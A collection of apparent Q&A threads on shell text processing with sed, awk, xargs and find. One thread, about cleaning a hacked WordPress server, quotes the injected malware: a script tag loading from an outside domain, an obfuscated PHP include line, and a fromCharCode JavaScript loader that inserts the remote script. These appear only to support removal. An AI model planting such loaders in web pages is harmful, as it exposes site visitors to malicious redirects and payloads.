gnu parallel + sed to edit both csv header and contents - bash

I'm trying to use command line tools to edit some CSV I have in the following format for several year folders:
dataset
year_1 (i.e. 1929)
csv_filename_1.csv
csv_filename_2.csv
csv_filename_3.csv
...
year_2
...
I'm trying to append each file's name to its content, creating a new column called filename that holds ./year_1/csv_filename_1.csv in every row. After that, I would gzip the file.
Due to the number of year folders (almost 100) and the CSVs quantities in each (totaling 100k+), I plan to use gnu parallel to run it, and
I was trying to use sed doing something like
fname="1929/csv_filename_1.csv" && \ # to simulate parallel's parameterization
sed -E -e '1s/$/,filename/' \ # append ",filename" to CSV header
-e '2,\$s/$/,${fname}/' ${fname} \ # append the filename string to the content
But I can't get the sed to work with the second expression, because I either get ${fname} written as-is to the file, or the sed error "sed: -e expression #1, char 6: unknown command: '\'" complaining about a comma or the slash. I have also tried grouping the expressions, like -e '1{s/$/,filename/};2,\${s/$/,${fname}/}', to no avail.
Currently, I gave up sed and started trying with awk, but not knowing why it didn't work is bothering me, so I came to ask why and how to make it work.
Just one more piece of info regarding how I intend to run this thing. It would be something like
find ~/dataset -iname "*csv" -print0 | parallel -0 -j0 '<the whole command here (sed + gz)>'
How could I do this? What am I forgetting? Thanks, folks!
PS: I just got it with awk
awk -v d="csv_filename_1.csv" -F"," 'FNR==1{a="filename"} FNR>1{a=d} {print $0","a}' csv_filename_1.csv | less
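For completeness, the original sed failed for two reasons: single quotes stop the shell from expanding ${fname}, and the escaped \$ reaches sed as a stray backslash, which it reports as an unknown command. Double-quoting the second expression (and switching the delimiter, since the filename contains slashes) fixes both. A minimal sketch with a demo file:

```shell
# demo file standing in for one of the CSVs
printf 'a,b\n1,2\n' > demo.csv
fname="1929/csv_filename_1.csv"   # simulating parallel's parameterization
# double quotes let ${fname} expand; \$ passes a literal $ through to sed;
# '|' as delimiter avoids clashing with the slash in the filename
sed -E -e '1s/$/,filename/' -e "2,\$s|\$|,${fname}|" demo.csv
# prints:
# a,b,filename
# 1,2,1929/csv_filename_1.csv
```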

This might work for you (GNU parallel and sed):
find . -type f -name '*.csv' | parallel sed -i \''1s/$/,filename/;1!s#$#,{}#'\' {}
Use find to deliver the filename to the parallel command.
Use sed to append ,filename to the heading of each file and the file name present in {} to each line in the file.
N.B. The second sed command uses alternative delimiters (s#...#...#) to allow for the slashes in the filename. Also, the find should be executed in the dataset directory.
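To fold in the compression step as well, the same edit can be tried serially before handing it to parallel. A sketch assuming GNU sed, with a throwaway demo tree standing in for the real dataset:

```shell
# demo tree standing in for the real dataset layout
mkdir -p dataset/1929 && printf 'a,b\n1,2\n' > dataset/1929/f.csv
cd dataset
# append the header field, then the ./year/file path to every data row, then gzip
find . -type f -name '*.csv' | while IFS= read -r f; do
  sed -i "1s/\$/,filename/;1!s#\$#,$f#" "$f" && gzip "$f"
done
gzip -dc ./1929/f.csv.gz
# prints:
# a,b,filename
# 1,2,./1929/f.csv
cd ..
```

Once this behaves as expected, the loop body becomes the quoted command given to parallel, with {} in place of $f.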

Sed & Mac OS Terminal: How to remove parentheses content from the first line of every file?

I am on macOS 10.14.6 and have a directory that contains subdirectories that all contain text files. Altogether, there are many hundreds of text files.
I would like to go through the text files and check for any content in the first line that is in parentheses. If such content is found, then the parentheses (and content in the parentheses) should be removed.
Example:
Before removal:
The new world (82 edition)
After removal:
The new world
How would I do this?
Steps I have tried:
Googling around, it seems sed would be best for this.
I have found this thread, which provides SED code for removing bracketed content.
sed -e 's/([^()]*)//g'
However, I am not sure how to adapt it to work on multiple files and also to limit it to the first line of those files. I found this thread which explains how to use SED on multiple files, but I am not sure how to adapt the example to work with parentheses content.
Please note: As long as the solution works on Mac OS terminal, then it does not need to use SED. However, from Googling, SED seems to be the most suited.
I managed to achieve what you're after simply by using a bash script and sed together, as so:
#!/bin/bash
for filename in "$PWD"/*.txt; do
  sed -i '' '1 s/([^()]*)//g' "$filename"
done
The script simply iterates over all the .txt files in $PWD (the current working directory, so that you can add this script to your bin and run it anywhere), and then runs the command
sed -i '' '1 s/([^()]*)//g' "$filename"
on the file. By starting the command with the number 1 we tell sed to only work on the first line of the file :)
Edit: Best Answer
The above works fine in a directory where all contained objects are files; in other words, it does not search recursively through subdirectories.
Therefore, after some research, this command should perform exactly what the question asks:
find . -name "*.txt" -exec sed -i '' '1 s/([^()]*)//g' {} \;
I must stress, and reiterate, that you should test this on a backup first to confirm it works. Otherwise, use the same command as above but change the '' in order to control the creation of backups. For example,
find . -name "*.txt" -exec sed -i '.bkp' '1 s/([^()]*)//g' {} \;
This command will perform the sed replace in the original file (keeping the filename) but will create a backup file for each, with .bkp appended; for example, test1.txt becomes test1.txt.bkp. This is a safer option, but choose what works best for you :)
Good try.
The command you were looking for, as a single line:
sed -E '1s|\([^\)]+\)||'
The command to replace each input file first line:
sed -Ei '1s|\([^\)]+\)||' *.txt
example:
echo "The new world (82 edition)" |sed -E '1s|\([^\)]+\)||'
The new world
Explanation
sed -Ei - the E option enables extended RegExp syntax; the i option does in-place file replacement
sed -Ei '1s|match RegExp||' - for the first line only, replace the first matched RegExp string with the empty string
\([^\)]+\) - RegExp matching: starts with (, then [^\)] (any char that is not )) repeated one or more times (+), terminated with )
Try:
# create a temporary file
tmp=$(mktemp)
# for each something in _the current directory_
for i in *; do
# if it is not a file, don't parse it
if [ ! -f "$i" ]; then continue; fi
# remove parenthesis on first line, save the output in temporary file
sed '1s/([^)]*)//g' "$i" > "$tmp"
# move temporary file to the original file
mv "$tmp" "$i"
done
# remove temporary file
rm "$tmp"

How to replace whole string using sed or possibly grep

So my whole server got hacked, or has a malware problem. My site is based on WordPress, and the majority of sites hosted on my server are WordPress based. The hacker added this line of code to every single file and to the database:
<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'></script>
I did search it via grep using
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
I'm trying to replace it throughout the file structure with sed and I've written the following command.
sed -i 's/\<script type=\'text\/javascript\' src=\'https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547\'\>\<\/script\>//g' index.php
I'm trying to replace the string on a single file index.php first, so I know it works.
and I know my code is wrong. Please help me with this.
I tried @Eran's code and it deleted the whole line, which is good and as expected. However, this junk remains:
/*ee8fa*/
#include "\057va\162/w\167w/\167eb\144ev\145lo\160er\141si\141/w\160-i\156cl\165de\163/j\163/c\157de\155ir\162or\057.9\06770\06637\070.i\143o";
/*ee8fa*/
And while I wish to delete all the content, I wish to keep the php opening tag <?php.
Though @slybloty's solution is easy, and it worked.
So, to remove the code fully from all the affected files, I'm running the following 3 commands. Thanks to all of you for this.
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" - To Remove the script line
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/057va/d' - To remove the #include line
find . -type f -name '*.php' -print0 | xargs -0 -t -P7 -n1 sed -i '/ee8fa/d' - To remove the comment line
Also, I ran all 3 commands again for '*.html', because the hacker's script created unwanted index.html in all the directories. I was not sure if deleting these index.html in bulk is the right approach.
now, I still need to figure out the junk files and traces of it.
The hacker script added the JS code as well.
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Trying to see if I can sed it as well.
Use double quotes (") for the string and don't escape the single quotes (') nor the tags (<>). Only escape the slashes (/).
sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.trasnaltemyrecords.com\/talk.js?track=r&subid=547'><\/script>//g" index.php
Whatever method you decide to use with sed, you can run multiple processes concurrently on multiple files with perfect filtering options with find and xargs. For example:
find . -type f -name '*.php' -print0 | xargs -0 -P7 -n1 sed -i '...'
It will:
find - find
-type f - only files
-name '*.php' - only names that end with .php
-print0 - print them separated by zero bytes
| xargs -0 - for each file separated by zero byte
-P7 - run 7 processes concurrently
-n1 - for each one file
sed - for each file run sed
-i - edit the file in place
'...' - the sed script you want to run from other answers.
You may want to add the -t option to xargs to see the progress. See man find and man xargs (http://man7.org/linux/man-pages/man1/xargs.1.html).
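A disposable dry run of the same pipeline, with an invented marker standing in for the injected script tag:

```shell
# two throwaway "infected" files
mkdir -p demo_site
printf 'x<bad/>y\n' > demo_site/a.php
printf '<bad/>z\n'  > demo_site/b.php
# strip the marker from every .php, two sed processes at a time
find demo_site -type f -name '*.php' -print0 | xargs -0 -P2 -n1 sed -i 's#<bad/>##g'
cat demo_site/a.php demo_site/b.php
# prints:
# xy
# z
```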
Single quotes are taken literally without escape characters.
In var='hello\'', you have an unclosed quote: the backslash is literal inside single quotes, so the final ' opens a new quoted string instead of closing one.
To fix this problem,
1) Use double quotes to surround the sed command OR
2) Terminate the single quoted string, add \', and reopen the quote string.
The second method is more confusing, however.
Additionally, sed can use any character as the delimiter of the s command. Since you have slashes in the pattern, it is easier to use commas. For instance, using the first method:
sed -i "s,\\<script type='text/javascript' src='https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\\>\\</script\\>,,g" index.php
Using the second method:
sed -i 's,\<script type='\''text/javascript'\'' src='\''https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=547'\''\>\</script\>,,g' index.php
This example is more educational than practical. Here is how '\'' works:
First ': End current quoted literal string
\': Enter single quote as literal character
Second ': Re-enter quoted literal string
As long as there are no spaces there, you will just be continuing your sed command. This quoting trick works in bash and other POSIX-style shells.
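A one-line demonstration of the close-escape-reopen sequence:

```shell
# 'It'\''s working' is three concatenated pieces: 'It' + \' + 's working',
# which the shell joins into the single argument: It's working
echo 'It'\''s working'
# prints: It's working
```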
I am leaving the escaped < and > in there because I'm not entirely sure what you are using this for. sed uses the \< and \> to mean word matching. I'm not sure if that is intentional or not.
If this is not matching anything, then you probably want to avoid escaping the < and >.
Edit: Please see @EranBen-Natan's solution in the comments for a more practical solution to the actual problem. My answer is more of a resource as to why OP was being prompted for more input with his original command.
Solution for edit 2
For this to work, I'm making the assumption that your sed has the non-standard option -z. The GNU version of sed has this. I'm also making the assumption that this code always appears in the same format, 6 lines long.
while read -r filename; do
# .bak is optional here, if you want to back up any files that are edited
sed -zi.bak 's/var pl = String\.fromCharCode(104,116,116,112,115[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n[^\n]*\n//g' "$filename"
done <<< "$(grep -lr 'var pl = String\.fromCharCode(104,116,116,112,115' .)"
How it works:
We are using the beginning of the fromCharCode line to match everything.
-z splits the file on nulls instead of new lines. This allows us to search for line feeds directly.
[^\n]*\n - This matches everything up to a line feed, then the line feed itself, avoiding greedy regex matching. Because we aren't splitting on line feeds (-z), a pattern such as var pl = String\.fromCharCode(104,116,116,112,115.*\n}\n would produce the largest possible match: if \n}\n appeared anywhere further down in the file, you would delete all the code between there and the malicious code. Repeating the non-greedy sequence 6 times instead matches exactly the end of the first line plus the next 5 lines.
grep -lr - Just a recursive grep where we only list the files that have the matching pattern. This way, sed isn't editing every file. Without this, -i.bak (not plain -i) would make a mess.
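A quick illustration of what -z buys (GNU sed assumed): without it, sed sees one line at a time, so \n in a pattern can never match; with it, a multi-line block can be deleted in a single substitution:

```shell
# delete a two-line block from the middle of the stream in one substitution
printf 'keep\nbad line 1\nbad line 2\nkeep too\n' \
  | sed -z 's/bad line 1\nbad line 2\n//'
# prints:
# keep
# keep too
```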
Do you have wp-mail-smtp plugin installed? We have the same malware and we had some weird thing in wp-content/plugins/wp-mail-smtp/src/Debug.php.
Also, the javascript link is in every post_content field in wp_posts in WordPress database.
I got the same thing today, all page posts got this nasty virus script added
<script src='https://scripts.trasnaltemyrecords.com/pixel.js' type='text/javascript'></script>
I dissabled it from database by
UPDATE wp_posts SET post_content = REPLACE(post_content, "src='https://scripts.trasnaltemyrecords.com", "data-src='https://scripts.trasnaltemyrecords.com")
At least I do not have infected files:
grep -r "trasnaltemyrecords" /var/www/html/{*,.*}
did not find a thing, but I have no idea how this got into the database, which does not put me at ease at all.
This infection caused redirects on pages; Chrome mostly detects and blocks this. I did not notice anything strange in /wp-mail-smtp/src/Debug.php.
This worked for me:
find ./ -type f -name '*.js' | xargs perl -i -0pe "s/var gdjfgjfgj235f = 1; var d=document;var s=d\.createElement\('script'\); s\.type='text\/javascript'; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48\); s\.src=pl; \nif \(document\.currentScript\) { \ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else {\nd\.getElementsByTagName\('head'\)\[0\]\.appendChild\(s\);\n}//"
You have to search for: *.js, *.json, *.map
I've got the same thing today, all page posts got the script added.
I've handled with them successfully by using the Search and replace plugin.
Moreover, I've also found in one record, in the wp_posts table's post_content column, the
following string:
https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043
and deleted it manually.

XARGS: Nesting Utilities within Utility call

I am trying to build a YAML file for a large database by piping in a list of names to printf with xargs.
I would like to call ls in the printf command to get files specific to each name in my list; however, calls to ls nested within a printf command don't seem to work.
The following command
cat w1.nextract.list | awk '{print $1}' | xargs -I {} printf "'{}':\n\tw1:\n\t\tanatomical_scan:\n\t\t\tAnat: $(ls $(pwd)/{})\n"
Just provides the following error
ls: cannot access '/data/raw/long/{}': No such file or directory
Followed by an output that looks like:
'149959':
w1:
anatomical_scan:
Anat:
I'd like the standard input to xargs to be usable within the nested utility command, to give me the completed path to the necessary files, i.e.:
'149959':
w1:
anatomical_scan:
Anat: /data/raw/long/149959/test-1/test9393.txt
Anyone have any ideas?
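The root cause, for anyone landing here: the shell expands $(ls $(pwd)/{}) once, before xargs ever substitutes {}, so ls is asked for a literal {}. Deferring the expansion to a per-argument shell avoids that; a sketch with a made-up id:

```shell
# the inner sh runs once per id, so $(pwd)/$1 is expanded at the right time;
# passing {} as a positional parameter (not spliced into the script text)
# also avoids code injection through hostile filenames
echo 149959 | xargs -I{} sh -c 'printf "      Anat: %s\n" "$(pwd)/$1"' sh {}
```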
A safer way that has several caveats would be:
% cat w1.nextract.list | \
sed -e 's#^\(^[^/]*\)/\(.*\)$#'\''\1'\'':\n w1:\nANA-SCAN\nANAT-PWD\1/\2#' \
-e "s#ANAT-PWD# Anat: `pwd`/#" \
-e 's/ANA-SCAN/ anatomical_scan:/'
There are restrictions on the contents of the w1.nextract.list file:
None of the lines may contain a hash ('#') character.
Any other special characters on a line may be unsafe.
For testing, I created the w1.nextract.list file with one entry:
149959/test-1/test9393.txt
The resulting output is here:
'149959':
w1:
anatomical_scan:
Anat: /data/raw/long/149959/test-1/test9393.txt
Can you explain in more detail? What makes this so fragile?
Feeding xargs input into a printf format can lead to unexpected results if the input file has special characters or escape sequences. A bad actor could then modify your input file to exploit this issue. Best practice is to avoid it.
Fragility comes from maintaining the w1.nextract.list file. You could auto generate the file to reduce this issue:
cd /data/raw/long/; find * -type f -print
What is a real YAML implementation?
The yq command is an example YAML implementation. You could use it to craft the .yaml file.
I haven't worked with these types of Python packages before, so it's a first-time-approach solution.
Using python, perl, or even php would allow you to craft the file without worrying about unsafe characters in the filenames.
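Staying in the shell, a plain while loop also sidesteps the problem, since command substitution then runs once per entry. A sketch with a demo tree mirroring the question's layout (directory and file names invented):

```shell
# demo tree and list mirroring the question
mkdir -p demo_raw/149959/test-1
: > demo_raw/149959/test-1/test9393.txt
printf '149959\n' > w1.nextract.list
# one YAML stanza per id; find resolves the file under each id's directory
while IFS= read -r id; do
  file=$(find "$PWD/demo_raw/$id" -type f | head -n 1)
  printf "'%s':\n  w1:\n    anatomical_scan:\n      Anat: %s\n" "$id" "$file"
done < w1.nextract.list
```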

Unix scripting in bash to search logs and return a specific part of a specific log file

Dare I say it, I am mainly a Windows person (please don't shoot me down too soon), although I have played around in Linux in the past (mostly command line).
I have a process I have to go through once in a while which is in essence searching all log files in a directory (and sub directories) for a certain filename and then getting something out of said log file.
My first step is
grep -Ril <filename or Partial filename you are looking for> log/*.log
From that I have the log filename and I vi that to find where it occurs.
To clarify: that grep is looking through all log files seeing if the filename after the -Ril occurs within them.
vi log/<log filename>
/<filename or Partial filename you are looking for>
I press j a couple of times to find CDATA, and then I have a URL I need to extract; then in PuTTY I select it, copy, and paste it into a browser.
Then I quit vi without saving.
FRED1 triggered at Mon Aug 31 14:09:31 NZST 2015 with incoming file /u03/incoming/fred/Fred.2
Fred.2
start grep
end grep
Renamed to Fred.2.20150831140931
<?xml version="1.0" encoding="UTF-8"?>
<runResponse><runReturn><item><name>runId</name><value>1703775</value></item><item><name>runHistoryId</name><value>1703775</value></item><item><name>runReportUrl</name><value>https://<Servername>:<port and path>b1a&sp=l0&sp=l1703775&sp=l1703775</value></item><item><name>displayRunReportUrl</name><value><![CDATA[https://<Servername>:<port and path2>&sp=l1703775&sp=l1703775]]></value></item><item><name>runStartTime</name><value>08/31/15 14:09</value></item><item><name>flowResponse</name><value></value></item><item><name>flowResult</name><value></value></item><item><name>flowReturnCode</name><value>Not a Return</value></item></runReturn></runResponse>
filePath=/u03/incoming/fred&fileName=Fred.2.20150831140931&team=dps&direction=incoming&size=31108&time=Aug 31 14:09&fts=nzlssftsd01
----------------------------------------------------------------------------------------
FRED1 triggered at Mon Aug 31 14:09:31 NZST 2015 with incoming file /u03/incoming/fred/Fred.3
Fred.3
start grep
end grep
Renamed to Fred.3.20150999999999
<?xml version="1.0" encoding="UTF-8"?>
<runResponse><runReturn><item><name>runId</name><value>1703775</value></item><item><name>runHistoryId</name><value>1703775</value></item><item><name>runReportUrl</name><value>https://<Servername>:<port and path>b1a&sp=l0&sp=l999999&sp=l9999999</value></item><item><name>displayRunReportUrl</name><value><![CDATA[https://<Servername>:<port and path2>&sp=l999999&sp=l999999]]></value></item><item><name>runStartTime</name><value>08/31/15 14:09</value></item><item><name>flowResponse</name><value></value></item><item><name>flowResult</name><value></value></item><item><name>flowReturnCode</name><value>Not a Return</value></item></runReturn></runResponse>
filePath=/u03/incoming/fred&fileName=Fred.3.20150999999999&team=dps&direction=incoming&size=31108&time=Aug 31 14:09&fts=nzlssftsd01
What I want to grab is the URL in CDATA[https://<Servername>:<port and path2>&sp=l999999&sp=l999999] for Fred.3.20150999999999 indicated by the line Renamed to Fred.3.20150999999999.
Is this possible? (And I do apologise for the XML formatting, but it is exactly as it is in the log file.)
Thanks in advance,
Tel
sed -n 's#\(.*CDATA\[\)\(.*\)\(\]\].*\)#\2#p' <logfile>
-n suppress automatic printing of pattern space
# - as sed pattern delimiter
( ) - grouping the patterns
\2 - second pattern
p - print
Update - grep file pattern
grep -Ril <filename or Partial filename you are looking for> log/*.log | xargs sed -n "/<pattern>/,/filePath=/p" | sed -n 's#\(.*CDATA\[\)\(.*\)\(\]\].*\)#\2#p'
xargs passes the output of the previous command to sed as its input files.
If pattern is Fred.3.20150999999999, first sed will print from matched pattern to filePath= and next sed will extract CDATA in it.
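A self-contained check of the extraction on a single sample line (hostname and ids invented):

```shell
# the second capture group is everything between CDATA[ and ]]
echo '<value><![CDATA[https://server:8443/report?sp=l999999&sp=l999999]]></value>' \
  | sed -n 's#\(.*CDATA\[\)\(.*\)\(\]\].*\)#\2#p'
# prints: https://server:8443/report?sp=l999999&sp=l999999
```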
While your grep command may be used to locate the file, the find command is quite a bit more flexible and a bit more appropriate. The basic use to locate your log file would be similar to:
find /path/to/logdir -type f -name "partial*.log"
Which will recursively search under /path/to/logdir for a file -type f whose name matches the pattern "partial*.log".
Isolating the url can be similar to the other answer, but here using multiple expressions, you can isolate the url with:
sed -e 's/^.*CDATA\[\(http[^]]*\).*$/\1/' <logfilename> \
-e '/^$/'d \
-e '/^[ \t\n].*$/'d
Output:
https://<Servername>:<port and path2>&sp=l1703775&sp=l1703775
Where the first expression isolates the url itself from within your <logfilename>, the second expression suppresses any blank lines, and finally the third removes any fragments returned that begin with a space, tab, or newline.
If you can tune your find command to reliably return the exact file you need to retrieve the url from, then you can write your find and sed command together as:
sed -e 's/^.*CDATA\[\(http[^]]*\).*$/\1/' \
$(find /path/to/logdir -type f -name "partial*.log") \
-e '/^$/'d \
-e '/^[ \t\n].*$/'d
Where you have simply used command substitution to replace <logfilename> with the find command enclosed in $(...).
Note there are many different ways to write the sed substitution, some probably more elegant than this one, but that is where the power lies in sed. Give this a try and let me know if you run into problems. I hope this helps.

How to extract a string at end of line after a specific word

I have different location, but they all have a pattern:
some_text/some_text/some_text/log/some_text.text
The locations don't all start with the same thing, and they don't have the same number of subdirectories, but I am only interested in what comes after log/. I would like to extract the .text extension.
edited question:
I have a lot of location:
/s/h/r/t/log/b.p
/t/j/u/f/e/log/k.h
/f/j/a/w/g/h/log/m.l
Just to show you that I don't know what they are: the user enters these locations, so I have no idea what the user will enter. The only thing I know is that each always contains log/ followed by the name of the file.
I would like to extract the type of the file, whatever string comes after the dot
The only thing I know is that it always contains log/ followed by the name
of the file.
I would like to extract the type of the file, whatever string comes
after the dot
based on this requirement, this line works:
grep -o '[^.]*$' file
for your example, it outputs:
text
You can use bash built-in string operations. The example below will extract everything after the last dot from the input string.
$ var="some_text/some_text/some_text/log/some_text.text"
$ echo "${var##*.}"
text
Alternatively, use sed:
$ sed 's/.*\.//' <<< "$var"
text
Not the cleanest way, but this will work
sed -e "s/.*log\///" | sed -e "s/\..*//"
These are the sed patterns for it, anyway; I'm not sure if you have that string in a variable, or if you're reading from a file, etc.
You could also grab that text and store it in sed's hold space for later substitution, etc. It all depends on exactly what you are trying to do.
Using awk
awk -F'.' '{print $NF}' file
Using sed
sed 's/.*\.//' file
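The two halves of the requirement (drop everything through log/, then keep what follows the last dot) also combine using the same built-in expansions:

```shell
p="/f/j/a/w/g/h/log/m.l"
file=${p##*/log/}   # strip the longest prefix ending in /log/  -> m.l
ext=${file##*.}     # strip the longest prefix ending in a dot  -> l
echo "$ext"
# prints: l
```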
Running from the root of this structure:
/s/h/r/t/log/b.p
/t/j/u/f/e/log/k.h
/f/j/a/w/g/h/log/m.l
This seems to work; you can skip the echo command if you really just want the file types with no record of where they came from.
$ for DIR in *; do
> echo -n "$DIR "
> find $DIR -path "*/log/*" -exec basename {} \; | sed 's/.*\.//'
> done
f l
s p
t h
